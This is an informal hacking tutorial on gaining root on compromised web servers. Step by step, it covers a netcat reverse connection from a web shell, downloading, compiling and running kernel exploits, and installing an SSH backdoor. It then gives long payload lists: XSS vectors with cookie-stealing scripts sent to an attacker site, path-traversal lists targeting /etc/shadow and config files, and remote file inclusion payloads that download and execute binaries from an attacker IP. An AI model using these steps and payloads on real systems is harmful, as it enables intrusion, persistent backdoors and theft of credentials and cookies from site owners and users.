Learn Root - Totally Explaind

#So Lets Start...

These are Some Basic Questions asked by myself as a n00b :P

# What is rooting ?
A. Getting access to the user => "root", the main admin of the site.


# What is the need of rooting ?
A. Getting master admin privillages of Servers 


Things you need



# A Shell on a Website
# An Exploit
# Log cleaner
# Ssh Backdoor
# Netcat
# A Brain

Simply you can seach on http://www.google.com for these, except BRAIN and SHELL 


Getting Back Connection to the servers


Open command prompt, and go to NetCat Path, Type
"cd netcat.exe"

ok Open your Shell in your browser, go to the back connection tab, if it is not there get a shell like "WSO 2.3" or Any other
thats your choice....

Specify your "ip & port as 2121". press connect, now you'll get a shell to the server, you can give commands to the server through that shell.

now came back to netcat and type "nc -l -v -p 2121"

it will give you this output:
Code:
c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...

Getting a Right exploit for the servers


Type : Uname -a & hit enter.
It'll look something like this:

Code:
[admin@www.target.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux

You have noted, It shows the kernal version of the server is: 2.6.18-194.26.1.el5
& Year is 2010.

You need to find a perfect exploit for it. you can find them at:-
$ Exploit-db.com
$ Packetstormsecurity.org
$ Th3-0utl4ws.com
$ Leetupload.com

Compiling & executing exploits


Now I've got a exploit, & it is written in C. So I can't execute it by just uploading. but I need to compile it.

Before proceeding further, Cd into the tmp directory, because it is always writable. So type: Cd /home/XXXXX/public_html/tmp
// The path may be different, replace it with yours.

So first I'll get the exploit on the server, So I type : Wget http://exploitsite.net/2010-exploits/exploit.c
// Note: There is no such site, I'm just taking it to show you.
It'll look something Like this:-

Code:
admin@www.target.com /home/target_usernemr/public_html/tmp]$ wget http://exploitsite.net/2010-exploits/exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/2010-exploits/exploit.c
Resolving www.exploitsite.net... 199.58.192.192
Connecting to www.exploitsite.net|199.58.192.192|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `exploit.c'


now change the permission of the exploit to 777.
Type: "Chmod 777 exploit.c"

Now the exploit is On my server, I just need to compile & execute it.
So, I'll give the command: "gcc -o exploit exploit.c"
It'll compile & save the exploit as >> exploit

Next step is to execute it So we'll type: "./exploit"


here it'll show different process...
: #
: #
got root you m0f0 !! [<example]

Now it say got root. Let's Check is it true,
Type: "whoami"

then it will say "root"

like: uid=0(root) gid=0(root) groups=0(root)

type "su" to get full privilages !


Installing Backdoors

type: "Wget http://www.urlofbackdoor.com/sshdoor.zip"


Then Type,
Unzip Sshdoor.zip
Then, => Cd sshdoor
Then type, ./run pass port
^ replace pass with your password, & a port.

Now connect with putty & enjoy root privileges. 

Methods to execute exploits written in other languages


C exploit

----------------------
gcc -o exploit exploit.c
chmod +x exploit
./exploit
----------------------

Perl Exploits

---------------
perl exploit.pl
---------------

Python

------------------
python exploit.py
------------------

php

-----------------
php exploit.php
-----------------

zip

----------------
unzip exploit.zip
./run
----------------

Just fo Education Purpose !!

Common ways possible XSS, SQL, PHP-inj ....

Sometimes it happens that we have a site that is vidm CSU, but do not know how to use injections, below I present the most

extended ones and not injection ...

XXS

</ Textarea> <script> alert (/ xss /) </ script>
</ Title> <script> alert (/ xss /) </ script>
<script src=http://yoursite.com/your_files.js> </ script>
"> <script> Alert (0) </ script>
<IMG SRC = javascript: Alert (String.fromCharCode (88,83,83))>
<IMG SRC=\"javascript:alert('XSS');\">
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=\"jav ascript:alert('XSS');\">
<marquee> <script> alert ('XSS') </ script> </ marquee>
<? echo ('<scr)';echo('ipt> alert (\ "XSS \") </ script>');?>
<style> @ im \ port '\ ja \ vasc \ ript: alert (\ "XSS \ ")';</ style>
<img src=foo.png onerror=alert(/xssed/) />
<script> alert (String.fromCharCode (88,83,83)) </ script>
<Scr <script> ipt> alert ('XSS');</ scr </ script> ipt>
<script>location.href="http://www.yourevilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
<script src="http://www.yourevilsite.org/cookiegrabber.php"> </ script>
<script> alert ('XSS');</ script>
<script> alert (1); </ script>
<IMG LOWSRC = \ "javascript: Alert ('XSS') \ ">
<IMG DYNSRC = \ "javascript: Alert ('XSS') \ ">
<font style='color:expression(alert(document.cookie))'>
<Img src = "javascript: Alert ('XSS') ">
<script language="JavaScript"> alert ('XSS') </ script>


<Body onunload = "javascript: Alert ('XSS');">
<Body onLoad = "alert ('XSS');"
[Color = red 'onmouseover = "alert (' xss')"] mouse over [/ color]
"/></ A ></>< img src = 1.gif onerror = alert (1)>
window.alert ("Bonjour!");
<div style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCode(88,83,83));'))">
<Iframe <? Php echo chr (11)?> Onload = alert ('XSS')></ iframe>
"> <Script alert (String.fromCharCode (88,83,83)) </ script>
'>> <marquee> <h1> XSS </ h1> </ marquee>
'">>< Script> alert ('XSS') </ script>
'">>< Marquee> <h1> XSS </ h1> </ marquee>
<META HTTP-EQUIV = \ "refresh \" CONTENT = \ "0; url = javascript: Alert ('XSS'); \ ">
<META HTTP-EQUIV = \ "refresh \" CONTENT = \ "0; URL = http://; URL = javascript: Alert ('XSS'); \ ">
<script> var var = 1; alert (var) </ script>
<STYLE Type="text/css"> BODY {background: url ("javascript: Alert ('XSS')")}</ STYLE>

<?='< SCRIPT> alert ("XSS") </ SCRIPT> '?>
<IMG SRC = 'vbscript: Msgbox (\ "XSS \") '>
"Onfocus = alert (document.domain)"> <"
<FRAMESET> <FRAME SRC = \ "javascript: Alert ('XSS'); \ "> </ FRAMESET>
<STYLE> Li {list-style-image: url (\ "javascript: Alert ('XSS') \ ");}</ STYLE> <UL> <LI> XSS
perl-e 'print \ "<SCR\0IPT> alert (\" XSS \ ") </ SCR \ 0IPT> \";'> out
perl-e 'print \ "<IMG SRC=java\0script:alert(\"XSS\")> \";'> out
<br size=\"&{alert('XSS')}\">

/ Etc / passwd
/ Etc / shadow
/ Etc / group
/ Etc / security / group
/ Etc / security / passwd
/ Etc / security / user
/ Etc / security / environ
/ Etc / security / limits
/ Usr / lib / security / mkuser.default
.. / Apache / logs / access.log
.. / .. / Apache / logs / error.log
.. / .. / Apache / logs / access.log
.. / .. / .. / Apache / logs / error.log
.. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / acces_log
.. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / acces.log
.. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / error_log
.. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / error.log
.. / .. / .. / .. / .. / .. / .. / Var / www / logs / access_log
.. / .. / .. / .. / .. / .. / .. / Var / www / logs / access.log
.. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / access_ log
.. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / access. log
.. / .. / .. / .. / .. / .. / .. / Var / log / apache / access_log
../../../../../../../var/log/apache2/access_log
.. / .. / .. / .. / .. / .. / .. / Var / log / apache / access.log
../../../../../../../var/log/apache2/access.log
.. / .. / .. / .. / .. / .. / .. / Var / log / access_log
.. / .. / .. / .. / .. / .. / .. / Var / log / access.log
.. / .. / .. / .. / .. / .. / .. / Var / www / logs / error_log
.. / .. / .. / .. / .. / .. / .. / Var / www / logs / error.log
.. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / error_l og
.. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / error.l og
.. / .. / .. / .. / .. / .. / .. / Var / log / apache / error_log
../../../../../../../var/log/apache2/error_log
.. / .. / .. / .. / .. / .. / .. / Var / log / apache / error.log
../../../../../../../var/log/apache2/error.log
.. / .. / .. / .. / .. / .. / .. / Var / log / error_log
.. / .. / .. / .. / .. / .. / .. / Var / log / error.log

Apache


.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / error_log
.. / Apache / logs / error.log
.. / Apache / logs / access.log
.. / .. / Apache / logs / error.log
.. / .. / Apache / logs / access.log
.. / .. / .. / Apache / logs / error.log
.. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / Apache / logs / error.log
.. / .. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / .. / Apache / logs / error.log
.. / .. / .. / .. / .. / Apache / logs / access.log
../apache2/logs/error.log
../apache2/logs/access.log
../../apache2/logs/error.log
../../apache2/logs/access.log
../../../apache2/logs/error.log
../../../apache2/logs/access.log
../../../../apache2/logs/error.log
../../../../apache2/logs/access.log
../../../../../apache2/logs/error.log
../../../../../apache2/logs/access.log
.. / Logs / error.log
.. / Logs / access.log
.. / .. / Logs / error.log
.. / .. / Logs / access.log
.. / .. / .. / Logs / error.log
.. / .. / .. / Logs / access.log
.. / .. / .. / .. / Logs / error.log
.. / .. / .. / .. / Logs / access.log
.. / .. / .. / .. / .. / Logs / error.log
.. / .. / .. / .. / .. / Logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / acces_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / acces.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / error.log
../../../../../../../../../../usr/local/apache2/logs/access_log
../../../../../../../../../../usr/local/apache2/logs/access.log
../../../../../../../../../../usr/local/apache2/logs/error_log
../../../../../../../../../../usr/local/apache2/logs/error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / error.log
../../../../../../../../../../var/log/apache2/access_log
../../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../../var/log/apache2/error_log
../../../../../../../../../../var/log/apache2/error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / lampp / logs / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / lampp / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / xampp / logs / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / xampp / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / lampp / logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / lampp / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / xampp / logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / xampp / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Program Files \ Apache Group \ Apache \ logs \ access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Program Files \ Apache Group \ Apache \ logs \ error.log
.. / .. / .. / Apache / logs / error.log
.. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / Apache / logs / error.log
.. / .. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / .. / Apache / logs / error.log
.. / .. / .. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / .. / .. / Apache / logs / error.log
.. / .. / .. / .. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / .. / .. / .. / Apache / logs / error.log
.. / .. / .. / .. / .. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / Apache / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / Apache / logs / access.log
.. / .. / .. / Logs / error.log
.. / .. / .. / Logs / access.log
.. / .. / .. / .. / Logs / error.log
.. / .. / .. / .. / Logs / access.log
.. / .. / .. / .. / .. / Logs / error.log
.. / .. / .. / .. / .. / Logs / access.log
.. / .. / .. / .. / .. / .. / Logs / error.log
.. / .. / .. / .. / .. / .. / Logs / access.log
.. / .. / .. / .. / .. / .. / .. / Logs / error.log
.. / .. / .. / .. / .. / .. / .. / Logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / Logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / Logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / acces_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / acces.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / error_log

conf


.. / .. / .. / .. / .. / .. / Usr / local / apache / conf / httpd.conf
../../../../../../usr/local/apache2/conf/httpd.conf
.. / .. / .. / .. / .. / .. / Etc / httpd / conf / httpd.conf
.. / .. / .. / .. / .. / .. / Etc / apache / conf / httpd.conf
.. / .. / .. / .. / .. / .. / Usr / local / etc / apache / conf / httpd.conf
../../../../../../etc/apache2/httpd.conf
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / conf / httpd.conf
../../../../../../../../../usr/local/apache2/conf/httpd.conf
.. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / httpd.conf
../../../../../../../../usr/local/apache2/httpd.conf
.. / .. / .. / .. / .. / .. / .. / .. / Usr / local / httpd / conf / httpd.conf
.. / .. / .. / .. / .. / .. / .. / Usr / local / etc / apache / conf / httpd.conf
../../../../../../../usr/local/etc/apache2/conf/httpd.conf
.. / .. / .. / .. / .. / .. / .. / Usr / local / etc / httpd / conf / httpd.conf
../../../../../../../usr/apache2/conf/httpd.conf
.. / .. / .. / .. / .. / .. / .. / Usr / apache / conf / httpd.conf
../../../../../../../usr/local/apps/apache2/conf/httpd.conf
.. / .. / .. / .. / .. / .. / .. / Usr / local / apps / apache / conf / httpd.conf
.. / .. / .. / .. / .. / .. / Etc / apache / conf / httpd.conf
../../../../../../etc/apache2/conf/httpd.conf
.. / .. / .. / .. / .. / .. / Etc / httpd / conf / httpd.conf
.. / .. / .. / .. / .. / .. / Etc / http / conf / httpd.conf
../../../../../../etc/apache2/httpd.conf
.. / .. / .. / .. / .. / .. / Etc / httpd / httpd.conf
.. / .. / .. / .. / .. / .. / Etc / http / httpd.conf
.. / .. / .. / .. / .. / .. / Etc / httpd.conf
.. / .. / .. / .. / .. / Opt / apache / conf / httpd.conf
../../../../../opt/apache2/conf/httpd.conf
.. / .. / .. / .. / Var / www / conf / httpd.conf
.. / .. / .. / Private / etc / httpd / httpd.conf
.. / .. / .. / Private / etc / httpd / httpd.conf.default
../../Volumes/webBackup/opt/apache2/conf/httpd.conf
.. / .. / Volumes / webBackup / private / etc / httpd / httpd.conf
.. / .. / Volumes / webBackup / private / etc / httpd / httpd.conf.default
.. / .. / .. / .. / .. / .. / .. / .. / .. / Program Files \ Apache Group \ Apache \ conf \ httpd.conf
.. / .. / .. / .. / .. / .. / .. / .. / .. / Program Files \ Apache Group \ Apache2 \ conf \ httpd.conf
.. / .. / .. / .. / .. / .. / .. / .. / .. / Program Files \ xampp \ apache \ conf \ httpd.conf
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / php / httpd.conf.php
../../../../../../../../../usr/local/php4/httpd.conf.php
../../../../../../../../../usr/local/php5/httpd.conf.php
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / php / httpd.conf
../../../../../../../../../usr/local/php4/httpd.conf
../../../../../../../../../usr/local/php5/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/ Usr / local / etc / apache / vhosts.conf

php.ini


.. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Bin / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / lib / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / lib / php / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / etc / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / lib / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / php / lib / php.ini
../../../../../../../../../usr/local/php4/lib/php.ini
../../../../../../../../../usr/local/php5/lib/php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / conf / php.ini
../../../../../../../../../etc/php4.4/fcgi/php.ini
../../../../../../../../../etc/php4/apache/php.ini
../../../../../../../../../etc/php4/apache2/php.ini
../../../../../../../../../etc/php5/apache/php.ini
../../../../../../../../../etc/php5/apache2/php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / php / php.ini
../../../../../../../../../etc/php/php4/php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / php / apache / php.ini
../../../../../../../../../etc/php/apache2/php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Web / conf / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / Zend / etc / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / xampp / etc / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Var / local / www / conf / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / php / cgi / php.ini
../../../../../../../../../etc/php4/cgi/php.ini
../../../../../../../../../etc/php5/cgi/php.ini
../../../../../../../../../php5 \ php.ini
../../../../../../../../../php4 \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Php \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / PHP \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / WINDOWS \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / WINNT \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Apache \ php \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Xampp \ apache \ bin \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / NetServer \ bin \ stable \ apache \ php.ini
../../../../../../../../../home2 \ bin \ stable \ apache \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Home \ bin \ stable \ apache \ php.ini
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/lib/php.ini

CPanel:
* log


/ Usr / local / cpanel / logs
/ Usr / local / cpanel / logs / stats_log
/ Usr / local / cpanel / logs / access_log
/ Usr / local / cpanel / logs / error_log
/ Usr / local / cpanel / logs / license_log
/ Usr / local / cpanel / logs / login_log
/ Usr / local / cpanel / logs / stats_log
* Conf
/ Var / cpanel / cpanel.config


MySQL:
* log


/ Var / log / mysql / mysql-bin.log
/ Var / log / mysql.log
/ Var / log / mysqlderror.log
/ Var / log / mysql / mysql.log
/ Var / log / mysql / mysql-slow.log
/ Var / mysql.log
* Conf
/ Var / lib / mysql / my.cnf
/ Etc / mysql / my.cnf
/ Etc / my.cnf

MySQL (Windows):
+ log conf

C: \ Program Files \ MySQL \ MySQL Server 5.0 \ data \ hostname.err
C: \ Program Files \ MySQL \ MySQL Server 5.0 \ data \ mysql.log
C: \ Program Files \ MySQL \ MySQL Server 5.0 \ data \ mysql.err
C: \ Program Files \ MySQL \ MySQL Server 5.0 \ data \ mysql-bin.log
C: \ Program Files \ MySQL \ data \ hostname.err
C: \ Program Files \ MySQL \ data \ mysql.log
C: \ Program Files \ MySQL \ data \ mysql.err
C: \ Program Files \ MySQL \ data \ mysql-bin.log
C: \ MySQL \ data \ hostname.err
C: \ MySQL \ data \ mysql.log
C: \ MySQL \ data \ mysql.err
C: \ MySQL \ data \ mysql-bin.log
C: \ Program Files \ MySQL \ MySQL Server 5.0 \ my.ini
C: \ Program Files \ MySQL \ MySQL Server 5.0 \ my.cnf
C: \ Program Files \ MySQL \ my.ini
C: \ Program Files \ MySQL \ my.cnf
C: \ MySQL \ my.ini
C: \ MySQL \ my.cnf

FTP


ProFTPD:
* Log
/ Etc / logrotate.d / proftpd
/ Www / logs / proftpd.system.log
/ Var / log / proftpd
* Conf
/ Etc / proftp.conf
/ Etc / protpd / proftpd.conf
/ Etc/vhcs2/proftpd/proftpd.conf
/ Etc / proftpd / modules.conf

vsftpd:
* Log
/ Var / log / vsftpd.log
/ Etc / vsftpd.chroot_list
/ Etc / logrotate.d / vsftpd.log
* Conf
/ Etc / vsftpd / vsftpd.conf
/ Etc / vsftpd.conf
/ Etc / chrootUsers

wu-ftpd:
* Log
/ Var / log / xferlog
/ Var / adm / log / xferlog
* Conf
/ Etc / wu-ftpd / ftpaccess
/ Etc / wu-ftpd / ftphosts
/ Etc / wu-ftpd / ftpusers

Pure-FTPd:
* Conf
/ Usr / sbin / pure-config.pl
/ Usr / etc / pure-ftpd.conf
/ Etc / pure-ftpd / pure-ftpd.conf
/ Usr / local / etc / pure-ftpd.conf
/ Usr / local / etc / pureftpd.pdb
/ Usr / local / pureftpd / etc / pureftpd.pdb
/ Usr / local / pureftpd / sbin / pure-config.pl
/ Usr / local / pureftpd / etc / pure-ftpd.conf
-/etc/pure-ftpd.conf
/ Etc / pure-ftpd / pure-ftpd.pdb
/ Etc / pureftpd.pdb
/ Etc / pureftpd.passwd
/ Etc / pure-ftpd / pureftpd.pdb
DragonflyBSD & FreeBSD: / usr / ports / ftp / pure-ftpd /
OpenBSD: / usr / ports / net / pure-ftpd /
NetBSD: / usr / pkgsrc / net / pureftpd /
Crux Linux: / usr / ports / contrib / pure-ftpd /
* Log
/ Var / log / pure-ftpd / pure-ftpd.log
/ Logs / pure-ftpd.log
/ Var / log / pureftpd.log

Other:
/ Var / log / ftp-proxy / ftp-proxy.log
/ Var / log / ftp-proxy
/ Var / log / ftplog
/ Etc / logrotate.d / ftp
/ Etc / ftpchroot
/ Etc / ftphosts

Mail Server


/ Var / log / exim_mainlog
/ Var / log / exim / mainlog
/ Var / log / maillog
/ Var / log / exim_paniclog
/ Var / log / exim / paniclog
/ Var / log / exim / rejectlog
/ Var / log / exim_rejectlog


PHPMyAdmin

Target
PHPMyAdmin
Files Requested
/ PMA / main.php
/ Admin / main.php
/ Admin / mysql / main.php
/ Admin / phpmyadmin / main.php
/ Admin / pma / main.php
/ Db / main.php
/ Dbadmin / main.php
/ Main.php
/ Myadmin / main.php
/ Mysql-admin/main.php
/ Mysql / main.php
/ Mysqladmin / main.php
/ PhpMyAdmin-2.2.3/main.php
/ PhpMyAdmin-2.2.6/main.php
/ PhpMyAdmin-2.5.1/main.php
/ PhpMyAdmin-2.5.4/main.php
/ PhpMyAdmin-2.5.6/main.php
/ Phpmyadmin / main.php
/ Phpmyadmin2/main.php
/ Web / phpMyAdmin / main.php
/ PMA / read_dump.php
/ Db / read_dump.php
/ Dbadmin / read_dump.phpv / myadmin / read_dump.php
/ Mysql / read_dump.php
/ Mysqladmin / read_dump.php
/ PhpMyAdmin% 202.6.4-pl4/read_dump.php
/ PhpMyAdmin% 202.7.0-beta1/read_dump.php
/ PhpMyAdmin% 202.7.0-pl1/read_dump.php
/ PhpMyAdmin% 202.7.0-rc1/read_dump.php
/ PhpMyAdmin% 202.7.0/read_dump.php
/ PhpMyAdmin-2.2.3/read_dump.php
/ PhpMyAdmin-2.2.7-pl1/read_dump.php
/ PhpMyAdmin-2.5.6/read_dump.php
/ PhpMyAdmin-2.5.7-pl1/read_dump.php
/ PhpMyAdmin-2.6.0-pl3/read_dump.php
/ PhpMyAdmin-2.6.0/read_dump.php
/ PhpMyAdmin-2.6.1-pl3/read_dump.php
/ PhpMyAdmin-2.6.3-pl1/read_dump.php
/ PhpMyAdmin-2.6.4/read_dump.php
/ Phpadmin / read_dump.php
/ Phpmyadmin / read_dump.php
/ Phpmyadmin1/read_dump.php
/ Phpmyadmin2/read_dump.php
/ Typo3/phpmyadmin/read_dump.php
/ Web / phpMyAdmin / read_dump.php
/ Xampp / phpmyadmin / read_dump.php

Some PHP scripts

/ DE/index2.php
/ FR/index2.php
/ NL/index2.php
/ US/index2.php
/ Cms / index.php
/ Cms/index2.php
/ Cvs / index.php
/ Cvs/index2.php
/ Index.php
/ Index2.php
/ Mambo / index.php
/ Mambo/index2.php
/ Mb / index.php
/ Mb/index2.php
/ Site/index2.php
/ V1/index2.php
/ V2/index2.php
/ V3/index2.php

phpBB

/ Modules / Forums / admin / admin_styles.php
/ Forums / admin / admin_styles.php
/ Includes / functions.php
/ Includes / functions_nomoketos_rules.php
/ Modules / Forums / admin / admin_mass_email.php
/ Modules / Forums / admin / index.php
phpbb_root_path = http://XXX.XXX.XX.XX/cmd.dat?
cmd = cd% 20/tmp; wget% 20XXX.XXX.XX.XX/cbac; chmod% 20 744% 20cbac;. / cbac; echo% 20YYY; echo |

Coppermine


Target
Coppermine
Files Requested
/ Modules / coppermine / themes / default / theme.php
Payload
THEME_DIR = http://XXX.XXX.XX.XX/cmd.gif?
cmd = cd% 20/tmp; wget% 20XXX.XXX.XX.XX/cbac; chmod% 20 744% 20cbac;. / cbac; echo% 20YYY; echo |

Mambo / Joomla Content Management System
/ Index.php
/ Index2.php
/ Mambo/index2.php
/ Cvs/index2.php
/ Cvs/mambo/index2.php
/ Php/mambo/index2.php
/ Cbcms / mod_cbsms_messages.php
/ Components / com_extcalendar / admin_events.php
/ Components / com_forum / download.php
/ Components / com_galleria / galleria.html.php
/ Components / com_hashcash / server.php
/ Components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
/ Components / com_loudmounth / includes / abbc / abbc.class.php
/ Components / com_pcchess / include.pcchess.php
/ Components / com_pccookbook / pccookbook.php
/ Components / com_performs / performs.php
/ Components / com_pollxt / conf.pollxt.php
/ Components/com_rsgallery2/rsgallery.html.php
/ Components / com_smf / smf.php
/ Components / com_simpleboard / file_upload.php
/ Components / com_sitemap / sitemap.xml.php
/ Components / com_videodb / core / videodb.class.xml.php
/ Mod_cbsms_messages.php
Payload
_REQUEST [Option] = com_content
_REQUEST [Itemid] = 1
GLOBALS =
mosConfig_absolute_path = http://XXX.XXX.XX.XX/cmd.gif?
cmd = cd% 20/tmp; wget% 20XXX.XXX.XX.XX/micu; chmod% 20 744% 20micu;. / micu; echo% 20YYY; echo |
